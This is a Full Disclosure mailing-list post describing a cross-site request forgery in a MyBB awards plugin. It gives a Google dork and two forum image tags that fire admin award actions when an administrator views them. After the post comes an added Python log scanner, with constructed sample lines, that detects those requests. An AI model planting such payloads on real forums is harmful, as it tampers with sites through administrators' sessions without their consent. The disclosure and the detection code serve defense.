# Google Dork: allinurl:myawards.php
# Date: 08/17/2014
# Exploit Author: Vagineer https://vagineering.me
# Version: ALL VERSIONS
# Tested on: MyBB 1.6.15

PoC (set this as your signature or iframe it)

Add awards
[img] https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2 [/img]

Remove awards
[img] https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1 [/img]

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
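
A defender-side check for the request pattern in the PoC, as an added example that is not part of the original post: it scans Combined Log Format access-log lines for GET requests to the awards admin action whose Referer lies outside the admin directory, which is what an image embedded in a post or signature produces. The log lines, the host `forum.example` and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD url PROTO" status size "referer" ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)
MODULE = "user-awards"            # taken from the PoC URLs
ACTIONS = {"awards_delete_user"}  # taken from the PoC URLs

def check_line(line):
    """Return a finding dict if the line matches the PoC request pattern, else None."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "GET":
        return None
    url = urlsplit(m["url"])
    if not url.path.endswith("/admin/index.php"):
        return None
    query = parse_qs(url.query)
    if query.get("module", [""])[0] != MODULE:
        return None
    if query.get("action", [""])[0] not in ACTIONS:
        return None
    # A click inside the admin panel carries a Referer under the admin directory.
    # Only the path is compared, since this log format does not record the Host.
    admin_dir = url.path.rsplit("/", 1)[0] + "/"
    referer = "" if m["referer"] == "-" else m["referer"]
    if urlsplit(referer).path.startswith(admin_dir):
        return None
    return {"ip": m["ip"], "time": m["time"], "url": m["url"], "referer": referer}

def scan(lines):
    """Return findings for every log line that matches."""
    return [f for f in map(check_line, lines) if f]

# Constructed sample log lines (not from the original post).
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Aug/2014:10:01:02 +0000] "GET /forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1 HTTP/1.1" 200 512 "https://forum.example/forum/showthread.php?tid=5" "Mozilla/5.0"',
    '203.0.113.7 - - [17/Aug/2014:10:02:10 +0000] "GET /forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1 HTTP/1.1" 200 512 "https://forum.example/forum/admin/index.php?module=user-awards" "Mozilla/5.0"',
    '198.51.100.4 - - [17/Aug/2014:10:03:00 +0000] "GET /forum/showthread.php?tid=5 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [17/Aug/2014:10:04:30 +0000] "GET /forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit shows that an administrator's browser issued the request; whether the award data actually changed has to be confirmed in the forum itself.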